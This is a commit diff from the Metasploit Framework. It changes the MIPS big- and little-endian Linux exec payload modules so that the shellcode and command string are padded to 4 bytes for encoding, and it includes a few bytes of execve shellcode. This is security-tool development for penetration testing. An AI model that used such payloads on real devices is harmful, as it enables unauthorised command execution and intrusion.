Land rapid7#3320, @m-1-k-3's mips exec payload fixes to allow encoding.

joevennix · joevennix · commit 827feaed9f7f · 2014-05-13T12:38:23.000-05:00
diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb
@@ -66,7 +66,13 @@ def generate
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -62,12 +62,18 @@ def generate
       "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
       "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
       "\xab\x0f\x02\x24" + # li v0,4011
-      "\x0c\x01\x01\x01"   # + syscall 0x40404
+      "\x0c\x01\x01\x01"   # syscall 0x40404
 
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 

Original file line number	Diff line number	Diff line change
`@@ -66,7 +66,13 @@ def generate`
`66`	`66`	`#`
`67`	`67`	`# Constructs the payload`
`68`	`68`	`#`
`69`		`- return super + shellcode + command_string + "\x00"`
	`69`	`+`
	`70`	`+ shellcode = shellcode + command_string + "\x00"`
	`71`	`+`
	`72`	`+ # we need to align our shellcode to 4 bytes`
	`73`	`+ (shellcode = shellcode + "\x00") while shellcode.length%4 != 0`
	`74`	`+`
	`75`	`+ return super + shellcode`
`70`	`76`
`71`	`77`	`end`
`72`	`78`